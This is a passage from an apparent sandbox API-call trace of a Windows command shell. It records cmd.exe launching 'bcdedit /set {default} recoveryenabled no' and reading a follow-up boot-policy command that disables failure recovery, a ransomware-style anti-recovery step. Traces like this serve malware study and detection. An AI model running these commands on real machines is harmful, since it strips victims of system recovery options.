_String2="TEMP=C:", _MaxCount=0x7) returned -17 [0213.611] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0213.611] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0213.611] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0213.611] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0213.611] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0213.611] _wcsnicmp (_String1="COPYCMD", _String2="windows", _MaxCount=0x7) returned -20 [0213.611] _wcsnicmp (_String1="COPYCMD", _String2="windows", _MaxCount=0x7) returned -20 [0213.611] GetProcessHeap () returned 0x2e0000 [0213.611] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x2f4640 | out: hHeap=0x2e0000) returned 1 [0213.611] GetProcessHeap () returned 0x2e0000 [0213.611] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x8, Size=0x12) returned 0x2f8900 [0213.611] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\bcdedit.exe", lpCommandLine="bcdedit /set {default} recoveryenabled no", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Windows\\system32", lpStartupInfo=0x1ef490*(cb=0x70, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="bcdedit /set {default} recoveryenabled no", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x1ef440 | out: lpCommandLine="bcdedit /set {default} recoveryenabled no", lpProcessInformation=0x1ef440*(hProcess=0x50, hThread=0x54, dwProcessId=0x440, dwThreadId=0x738)) returned 1 [0213.613] CloseHandle (hObject=0x54) returned 1 [0213.613] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0213.613] GetProcessHeap () returned 0x2e0000 [0213.614] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x2fb240 | out: hHeap=0x2e0000) returned 1 [0213.614] GetEnvironmentStringsW () returned 0x2fb240* [0213.614] GetProcessHeap () returned 0x2e0000 [0213.614] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x8, Size=0xaea) returned 0x2f8980 [0213.614] FreeEnvironmentStringsW (penv=0x2fb240) returned 1 [0213.614] NtQueryInformationProcess (in: ProcessHandle=0x50, ProcessInformationClass=0x0, ProcessInformation=0x1eed48, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x1eed48, ReturnLength=0x0) returned 0x0 [0213.614] ReadProcessMemory (in: hProcess=0x50, lpBaseAddress=0x7fffffdf000, lpBuffer=0x1eed80, nSize=0x380, lpNumberOfBytesRead=0x1eed40 | out: lpBuffer=0x1eed80*, lpNumberOfBytesRead=0x1eed40*=0x380) returned 1 [0213.614] WaitForSingleObject (hHandle=0x50, dwMilliseconds=0xffffffff) returned 0x0 [0213.648] GetExitCodeProcess (in: hProcess=0x50, lpExitCode=0x1ef388 | out: lpExitCode=0x1ef388*=0x0) returned 1 [0213.648] CloseHandle (hObject=0x50) returned 1 [0213.648] _vsnwprintf (in: _Buffer=0x1ef5f8, _BufferCount=0x13, _Format="%08X", _ArgList=0x1ef398 | out: _Buffer="00000000") returned 8 [0213.648] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1 [0213.648] GetProcessHeap () returned 0x2e0000 [0213.648] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x2f8980 | out: hHeap=0x2e0000) returned 1 [0213.648] GetEnvironmentStringsW () returned 0x2fb240* [0213.648] GetProcessHeap () returned 0x2e0000 [0213.648] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x8, Size=0xaea) returned 0x2f8980 [0213.649] FreeEnvironmentStringsW (penv=0x2fb240) returned 1 [0213.649] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0213.649] GetProcessHeap () returned 0x2e0000 [0213.649] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x2f8980 | out: hHeap=0x2e0000) returned 1 [0213.649] GetEnvironmentStringsW () returned 0x2fb240* [0213.649] GetProcessHeap () returned 0x2e0000 [0213.649] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x8, Size=0xaea) returned 0x2f8980 [0213.650] FreeEnvironmentStringsW (penv=0x2fb240) returned 1 [0213.650] GetProcessHeap () returned 0x2e0000 [0213.650] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x2f8900 | out: hHeap=0x2e0000) returned 1 [0213.650] DeleteProcThreadAttributeList (in: lpAttributeList=0x1ef458 | out: lpAttributeList=0x1ef458) [0213.650] SetConsoleTitleW (lpConsoleTitle="Administrator: C:\\Windows\\system32\\cmd.exe") returned 1 [0213.650] _get_osfhandle (_FileHandle=1) returned 0xa8 [0213.650] SetConsoleMode (hConsoleHandle=0xa8, dwMode=0x0) returned 0 [0213.650] _get_osfhandle (_FileHandle=1) returned 0xa8 [0213.650] GetConsoleMode (in: hConsoleHandle=0xa8, lpMode=0x4ab3e194 | out: lpMode=0x4ab3e194) returned 0 [0213.651] _get_osfhandle (_FileHandle=0) returned 0x9c [0213.651] GetConsoleMode (in: hConsoleHandle=0x9c, lpMode=0x4ab3e198 | out: lpMode=0x4ab3e198) returned 0 [0213.651] GetConsoleOutputCP () returned 0x1b5 [0213.651] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4ab4bfe0 | out: lpCPInfo=0x4ab4bfe0) returned 1 [0213.651] SetThreadUILanguage (LangId=0x0) returned 0x7fffffd0409 [0213.651] GetProcessHeap () returned 0x2e0000 [0213.651] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x2f5be0 | out: hHeap=0x2e0000) returned 1 [0213.651] GetProcessHeap () returned 0x2e0000 [0213.651] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x2f9be0 | out: hHeap=0x2e0000) returned 1 [0213.651] GetProcessHeap () returned 0x2e0000 [0213.651] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x2faa10 | out: hHeap=0x2e0000) returned 1 [0213.651] GetProcessHeap () returned 0x2e0000 [0213.651] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x2e1320 | out: hHeap=0x2e0000) returned 1 [0213.651] GetProcessHeap () returned 0x2e0000 [0213.651] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x2f5b70 | out: hHeap=0x2e0000) returned 1 [0213.651] GetProcessHeap () returned 0x2e0000 [0213.651] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x300ea0 | out: hHeap=0x2e0000) returned 1 [0213.651] GetProcessHeap () returned 0x2e0000 [0213.651] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x2f99d0 | out: hHeap=0x2e0000) returned 1 [0213.651] GetProcessHeap () returned 0x2e0000 [0213.651] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x2f4610 | out: hHeap=0x2e0000) returned 1 [0213.651] GetProcessHeap () returned 0x2e0000 [0213.651] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x2f97c0 | out: hHeap=0x2e0000) returned 1 [0213.651] _vsnwprintf (in: _Buffer=0x4ab56340, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0x1ef8b8 | out: _Buffer="\r\n") returned 2 [0213.651] _get_osfhandle (_FileHandle=1) returned 0xa8 [0213.651] GetFileType (hFile=0xa8) returned 0x3 [0213.652] _get_osfhandle (_FileHandle=1) returned 0xa8 [0213.652] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r\n", cchWideChar=-1, lpMultiByteStr=0x4ab4c320, cbMultiByte=8192, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\n", lpUsedDefaultChar=0x0) returned 3 [0213.652] WriteFile (in: hFile=0xa8, lpBuffer=0x4ab4c320*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x1ef888, lpOverlapped=0x0 | out: lpBuffer=0x4ab4c320*, lpNumberOfBytesWritten=0x1ef888*=0x2, lpOverlapped=0x0) returned 1 [0213.652] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4ab3f360, nSize=0x2000 | out: lpBuffer="$P$G") returned 0x4 [0213.652] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4ab4c0a0 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0213.652] _vsnwprintf (in: _Buffer=0x4ab3eb60, _BufferCount=0x3fe, _Format="%s", _ArgList=0x1ef8c8 | out: _Buffer="C:\\Windows\\system32") returned 19 [0213.652] _vsnwprintf (in: _Buffer=0x4ab3eb86, _BufferCount=0x3eb, _Format="%c", _ArgList=0x1ef8c8 | out: _Buffer=">") returned 1 [0213.652] _get_osfhandle (_FileHandle=1) returned 0xa8 [0213.652] GetFileType (hFile=0xa8) returned 0x3 [0213.652] _get_osfhandle (_FileHandle=1) returned 0xa8 [0213.652] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="C:\\Windows\\system32>", cchWideChar=-1, lpMultiByteStr=0x4ab4c320, cbMultiByte=8192, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Windows\\system32>", lpUsedDefaultChar=0x0) returned 21 [0213.652] WriteFile (in: hFile=0xa8, lpBuffer=0x4ab4c320*, nNumberOfBytesToWrite=0x14, lpNumberOfBytesWritten=0x1ef8b8, lpOverlapped=0x0 | out: lpBuffer=0x4ab4c320*, lpNumberOfBytesWritten=0x1ef8b8*=0x14, lpOverlapped=0x0) returned 1 [0213.652] _get_osfhandle (_FileHandle=0) returned 0x9c [0213.652] GetFileType (hFile=0x9c) returned 0x3 [0213.652] _get_osfhandle (_FileHandle=0) returned 0x9c [0213.652] SetFilePointer (in: hFile=0x9c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0213.652] ReadFile (in: hFile=0x9c, lpBuffer=0x4ab4c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x1efbb8, lpOverlapped=0x0 | out: lpBuffer=0x4ab4c320*, lpNumberOfBytesRead=0x1efbb8*=0x1, lpOverlapped=0x0) returned 1 [0213.652] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4ab4c320, cbMultiByte=1, lpWideCharStr=0x4ab4e320, cchWideChar=1 | out: lpWideCharStr="wcdedit /set {default} recoveryenabled no\nnoreallfailures\n") returned 1 [0213.652] _get_osfhandle (_FileHandle=0) returned 0x9c [0213.652] SetFilePointer (in: hFile=0x9c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0213.652] ReadFile (in: hFile=0x9c, lpBuffer=0x4ab4c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x1efbb8, lpOverlapped=0x0 | out: lpBuffer=0x4ab4c320*, lpNumberOfBytesRead=0x1efbb8*=0x1, lpOverlapped=0x0) returned 1 [0213.652] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4ab4c320, cbMultiByte=1, lpWideCharStr=0x4ab4e322, cchWideChar=1 | out: lpWideCharStr="bdedit /set {default} recoveryenabled no\nnoreallfailures\n") returned 1 [0213.652] _get_osfhandle (_FileHandle=0) returned 0x9c [0213.652] SetFilePointer (in: hFile=0x9c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0213.652] ReadFile (in: hFile=0x9c, lpBuffer=0x4ab4c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x1efbb8, lpOverlapped=0x0 | out: lpBuffer=0x4ab4c320*, lpNumberOfBytesRead=0x1efbb8*=0x1, lpOverlapped=0x0) returned 1 [0213.652] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4ab4c320, cbMultiByte=1, lpWideCharStr=0x4ab4e324, cchWideChar=1 | out: lpWideCharStr="aedit /set {default} recoveryenabled no\nnoreallfailures\n") returned 1 [0213.652] _get_osfhandle (_FileHandle=0) returned 0x9c [0213.652] SetFilePointer (in: hFile=0x9c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0213.653] ReadFile (in: hFile=0x9c, lpBuffer=0x4ab4c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x1efbb8, lpOverlapped=0x0 | out: lpBuffer=0x4ab4c320*, lpNumberOfBytesRead=0x1efbb8*=0x1, lpOverlapped=0x0) returned 1 [0213.653] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4ab4c320, cbMultiByte=1, lpWideCharStr=0x4ab4e326, cchWideChar=1 | out: lpWideCharStr="ddit /set {default} recoveryenabled no\nnoreallfailures\n") returned 1 [0213.653] _get_osfhandle (_FileHandle=0) returned 0x9c [0213.653] SetFilePointer (in: hFile=0x9c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0213.653] ReadFile (in: hFile=0x9c, lpBuffer=0x4ab4c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x1efbb8, lpOverlapped=0x0 | out: lpBuffer=0x4ab4c320*, lpNumberOfBytesRead=0x1efbb8*=0x1, lpOverlapped=0x0) returned 1 [0213.653] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4ab4c320, cbMultiByte=1, lpWideCharStr=0x4ab4e328, cchWideChar=1 | out: lpWideCharStr="mit /set {default} recoveryenabled no\nnoreallfailures\n") returned 1 [0213.653] _get_osfhandle (_FileHandle=0) returned 0x9c [0213.653] SetFilePointer (in: hFile=0x9c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0213.653] ReadFile (in: hFile=0x9c, lpBuffer=0x4ab4c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x1efbb8, lpOverlapped=0x0 | out: lpBuffer=0x4ab4c320*, lpNumberOfBytesRead=0x1efbb8*=0x1, lpOverlapped=0x0) returned 1 [0213.653] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4ab4c320, cbMultiByte=1, lpWideCharStr=0x4ab4e32a, cchWideChar=1 | out: lpWideCharStr="it /set {default} recoveryenabled no\nnoreallfailures\n") returned 1 [0213.653] _get_osfhandle (_FileHandle=0) returned 0x9c [0213.653] SetFilePointer (in: hFile=0x9c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0213.653] ReadFile (in: hFile=0x9c, lpBuffer=0x4ab4c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x1efbb8, lpOverlapped=0x0 | out: lpBuffer=0x4ab4c320*, lpNumberOfBytesRead=0x1efbb8*=0x1, lpOverlapped=0x0) returned 1 [0213.653] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4ab4c320, cbMultiByte=1, lpWideCharStr=0x4ab4e32c, cchWideChar=1 | out: lpWideCharStr="n /set {default} recoveryenabled no\nnoreallfailures\n") returned 1 [0213.653] _get_osfhandle (_FileHandle=0) returned 0x9c [0213.653] SetFilePointer (in: hFile=0x9c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0213.653] ReadFile (in: hFile=0x9c, lpBuffer=0x4ab4c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x1efbb8, lpOverlapped=0x0 | out: lpBuffer=0x4ab4c320*, lpNumberOfBytesRead=0x1efbb8*=0x1, lpOverlapped=0x0) returned 1 [0213.653] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4ab4c320, cbMultiByte=1, lpWideCharStr=0x4ab4e32e, cchWideChar=1 | out: lpWideCharStr=" /set {default} recoveryenabled no\nnoreallfailures\n") returned 1 [0213.653] _get_osfhandle (_FileHandle=0) returned 0x9c [0213.653] SetFilePointer (in: hFile=0x9c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0213.653] ReadFile (in: hFile=0x9c, lpBuffer=0x4ab4c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x1efbb8, lpOverlapped=0x0 | out: lpBuffer=0x4ab4c320*, lpNumberOfBytesRead=0x1efbb8*=0x1, lpOverlapped=0x0) returned 1 [0213.653] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4ab4c320, cbMultiByte=1, lpWideCharStr=0x4ab4e330, cchWideChar=1 | out: lpWideCharStr="dset {default} recoveryenabled no\nnoreallfailures\n") returned 1 [0213.653] _get_osfhandle (_FileHandle=0) returned 0x9c [0213.653] SetFilePointer (in: hFile=0x9c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0213.653] ReadFile (in: hFile=0x9c, lpBuffer=0x4ab4c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x1efbb8, lpOverlapped=0x0 | out: lpBuffer=0x4ab4c320*, lpNumberOfBytesRead=0x1efbb8*=0x1, lpOverlapped=0x0) returned 1 [0213.654] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4ab4c320, cbMultiByte=1, lpWideCharStr=0x4ab4e332, cchWideChar=1 | out: lpWideCharStr="eet {default} recoveryenabled no\nnoreallfailures\n") returned 1 [0213.654] _get_osfhandle (_FileHandle=0) returned 0x9c [0213.654] SetFilePointer (in: hFile=0x9c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0213.654] ReadFile (in: hFile=0x9c, lpBuffer=0x4ab4c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x1efbb8, lpOverlapped=0x0 | out: lpBuffer=0x4ab4c320*, lpNumberOfBytesRead=0x1efbb8*=0x1, lpOverlapped=0x0) returned 1 [0213.654] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4ab4c320, cbMultiByte=1, lpWideCharStr=0x4ab4e334, cchWideChar=1 | out: lpWideCharStr="lt {default} recoveryenabled no\nnoreallfailures\n") returned 1 [0213.654] _get_osfhandle (_FileHandle=0) returned 0x9c [0213.654] SetFilePointer (in: hFile=0x9c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0213.654] ReadFile (in: hFile=0x9c, lpBuffer=0x4ab4c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x1efbb8, lpOverlapped=0x0 | out: lpBuffer=0x4ab4c320*, lpNumberOfBytesRead=0x1efbb8*=0x1, lpOverlapped=0x0) returned 1 [0213.654] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4ab4c320, cbMultiByte=1, lpWideCharStr=0x4ab4e336, cchWideChar=1 | out: lpWideCharStr="e {default} recoveryenabled no\nnoreallfailures\n") returned 1 [0213.654] _get_osfhandle (_FileHandle=0) returned 0x9c [0213.654] SetFilePointer (in: hFile=0x9c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0213.654] ReadFile (in: hFile=0x9c, lpBuffer=0x4ab4c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x1efbb8, lpOverlapped=0x0 | out: lpBuffer=0x4ab4c320*, lpNumberOfBytesRead=0x1efbb8*=0x1, lpOverlapped=0x0) returned 1 [0213.654] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4ab4c320, cbMultiByte=1, lpWideCharStr=0x4ab4e338, cchWideChar=1 | out: lpWideCharStr="t{default} recoveryenabled no\nnoreallfailures\n") returned 1 [0213.654] _get_osfhandle (_FileHandle=0) returned 0x9c [0213.654] SetFilePointer (in: hFile=0x9c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0213.654] ReadFile (in: hFile=0x9c, lpBuffer=0x4ab4c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x1efbb8, lpOverlapped=0x0 | out: lpBuffer=0x4ab4c320*, lpNumberOfBytesRead=0x1efbb8*=0x1, lpOverlapped=0x0) returned 1 [0213.654] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4ab4c320, cbMultiByte=1, lpWideCharStr=0x4ab4e33a, cchWideChar=1 | out: lpWideCharStr="edefault} recoveryenabled no\nnoreallfailures\n") returned 1 [0213.654] _get_osfhandle (_FileHandle=0) returned 0x9c [0213.654] SetFilePointer (in: hFile=0x9c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0213.654] ReadFile (in: hFile=0x9c, lpBuffer=0x4ab4c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x1efbb8, lpOverlapped=0x0 | out: lpBuffer=0x4ab4c320*, lpNumberOfBytesRead=0x1efbb8*=0x1, lpOverlapped=0x0) returned 1 [0213.654] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4ab4c320, cbMultiByte=1, lpWideCharStr=0x4ab4e33c, cchWideChar=1 | out: lpWideCharStr=" efault} recoveryenabled no\nnoreallfailures\n") returned 1 [0213.654] _get_osfhandle (_FileHandle=0) returned 0x9c [0213.654] SetFilePointer (in: hFile=0x9c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0213.654] ReadFile (in: hFile=0x9c, lpBuffer=0x4ab4c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x1efbb8, lpOverlapped=0x0 | out: lpBuffer=0x4ab4c320*, lpNumberOfBytesRead=0x1efbb8*=0x1, lpOverlapped=0x0) returned 1 [0213.654] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4ab4c320, cbMultiByte=1, lpWideCharStr=0x4ab4e33e, cchWideChar=1 | out: lpWideCharStr="cfault} recoveryenabled no\nnoreallfailures\n") returned 1 [0213.654] _get_osfhandle (_FileHandle=0) returned 0x9c [0213.654] SetFilePointer (in: hFile=0x9c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0213.654] ReadFile (in: hFile=0x9c, lpBuffer=0x4ab4c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x1efbb8, lpOverlapped=0x0 | out: lpBuffer=0x4ab4c320*, lpNumberOfBytesRead=0x1efbb8*=0x1, lpOverlapped=0x0) returned 1 [0213.654] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4ab4c320, cbMultiByte=1, lpWideCharStr=0x4ab4e340, cchWideChar=1 | out: lpWideCharStr="aault} recoveryenabled no\nnoreallfailures\n") returned 1 [0213.654] _get_osfhandle (_FileHandle=0) returned 0x9c [0213.654] SetFilePointer (in: hFile=0x9c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0213.654] ReadFile (in: hFile=0x9c, lpBuffer=0x4ab4c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x1efbb8, lpOverlapped=0x0 | out: lpBuffer=0x4ab4c320*, lpNumberOfBytesRead=0x1efbb8*=0x1, lpOverlapped=0x0) returned 1 [0213.655] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4ab4c320, cbMultiByte=1, lpWideCharStr=0x4ab4e342, cchWideChar=1 | out: lpWideCharStr="tult} recoveryenabled no\nnoreallfailures\n") returned 1 [0213.655] _get_osfhandle (_FileHandle=0) returned 0x9c [0213.655] SetFilePointer (in: hFile=0x9c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0213.655] ReadFile (in: hFile=0x9c, lpBuffer=0x4ab4c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x1efbb8, lpOverlapped=0x0 | out: lpBuffer=0x4ab4c320*, lpNumberOfBytesRead=0x1efbb8*=0x1, lpOverlapped=0x0) returned 1 [0213.655] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4ab4c320, cbMultiByte=1, lpWideCharStr=0x4ab4e344, cchWideChar=1 | out: lpWideCharStr="alt} recoveryenabled no\nnoreallfailures\n") returned 1 [0213.655] _get_osfhandle (_FileHandle=0) returned 0x9c [0213.655] SetFilePointer (in: hFile=0x9c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0213.655] ReadFile (in: hFile=0x9c, lpBuffer=0x4ab4c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x1efbb8, lpOverlapped=0x0 | out: lpBuffer=0x4ab4c320*, lpNumberOfBytesRead=0x1efbb8*=0x1, lpOverlapped=0x0) returned 1 [0213.655] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4ab4c320, cbMultiByte=1, lpWideCharStr=0x4ab4e346, cchWideChar=1 | out: lpWideCharStr="lt} recoveryenabled no\nnoreallfailures\n") returned 1 [0213.655] _get_osfhandle (_FileHandle=0) returned 0x9c [0213.655] SetFilePointer (in: hFile=0x9c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0213.655] ReadFile (in: hFile=0x9c, lpBuffer=0x4ab4c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x1efbb8, lpOverlapped=0x0 | out: lpBuffer=0x4ab4c320*, lpNumberOfBytesRead=0x1efbb8*=0x1, lpOverlapped=0x0) returned 1 [0213.655] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4ab4c320, cbMultiByte=1, lpWideCharStr=0x4ab4e348, cchWideChar=1 | out: lpWideCharStr="o} recoveryenabled no\nnoreallfailures\n") returned 1 [0213.655] _get_osfhandle (_FileHandle=0) returned 0x9c [0213.655] SetFilePointer (in: hFile=0x9c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0213.655] ReadFile (in: hFile=0x9c, lpBuffer=0x4ab4c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x1efbb8, lpOverlapped=0x0 | out: lpBuffer=0x4ab4c320*, lpNumberOfBytesRead=0x1efbb8*=0x1, lpOverlapped=0x0) returned 1 [0213.655] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4ab4c320, cbMultiByte=1, lpWideCharStr=0x4ab4e34a, cchWideChar=1 | out: lpWideCharStr="g recoveryenabled no\nnoreallfailures\n") returned 1 [0213.655] _get_osfhandle (_FileHandle=0) returned 0x9c [0213.655] SetFilePointer (in: hFile=0x9c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0213.655] ReadFile (in: hFile=0x9c, lpBuffer=0x4ab4c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x1efbb8, lpOverlapped=0x0 | out: lpBuffer=0x4ab4c320*, lpNumberOfBytesRead=0x1efbb8*=0x1, lpOverlapped=0x0) returned 1 [0213.655] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4ab4c320, cbMultiByte=1, lpWideCharStr=0x4ab4e34c, cchWideChar=1 | out: lpWideCharStr=" recoveryenabled no\nnoreallfailures\n") returned 1 [0213.655] _get_osfhandle (_FileHandle=0) returned 0x9c [0213.655] SetFilePointer (in: hFile=0x9c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0213.655] ReadFile (in: hFile=0x9c, lpBuffer=0x4ab4c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x1efbb8, lpOverlapped=0x0 | out: lpBuffer=0x4ab4c320*, 